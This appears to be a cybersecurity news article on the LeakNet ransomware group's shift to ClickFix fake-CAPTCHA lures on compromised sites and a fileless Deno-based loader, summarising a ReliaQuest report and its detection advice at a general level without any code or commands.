The LeakNet ransomware operation has significantly evolved its initial access strategy by deploying the "ClickFix" social engineering tactic through compromised legitimate websites. According to a new technical report from cybersecurity firm ReliaQuest, this marks a strategic shift away from traditional methods like purchasing stolen credentials from Initial Access Brokers (IABs). ClickFix attacks manipulate users into manually executing malicious commands under the guise of fixing a fabricated error, such as a fake CAPTCHA verification failure. This approach allows threat actors to bypass technical security controls by exploiting human trust and routine workflows, casting a wide net across various industries rather than targeting a specific vertical.
A second, critical technical innovation in LeakNet's attack chain is the deployment of a sophisticated, staged command-and-control (C2) loader built on the Deno JavaScript runtime. This loader is designed to execute malicious payloads directly in memory (a technique known as "fileless" execution), significantly hindering detection by traditional antivirus solutions that rely on scanning files written to disk. The use of Deno, a modern runtime for JavaScript and TypeScript, provides attackers with a powerful and flexible platform to orchestrate post-exploitation activities, further obscuring their operations from security tools.
The convergence of these two tactics—social engineering for access and advanced in-memory execution for deployment—creates a potent and repeatable attack sequence. As ReliaQuest analysts note, the key defensive insight is that regardless of the initial entry point (ClickFix or purchased access), the post-exploitation behaviors are consistent. This provides defenders with concrete detection opportunities at various stages of the attack lifecycle, well before the final ransomware payload is deployed. Understanding this sequence—from the fake CAPTCHA lure to the Deno-based memory loader—is crucial for building behavioral detections that can disrupt the attack chain early.
The operational benefits for LeakNet are substantial. The ClickFix method reduces dependence on volatile third-party access brokers, lowers the per-victim acquisition cost, and eliminates the bottleneck of waiting for valuable corporate credentials to appear on underground markets. First appearing in November 2024 and styling itself as a "digital watchdog" for "internet freedom," LeakNet has targeted industrial entities, according to data from industrial cybersecurity firm Dragos. Its adoption of these advanced techniques signals a broader trend where ransomware groups are increasingly weaponizing trusted user interactions and leveraging modern development platforms like Deno to enhance stealth and efficacy.
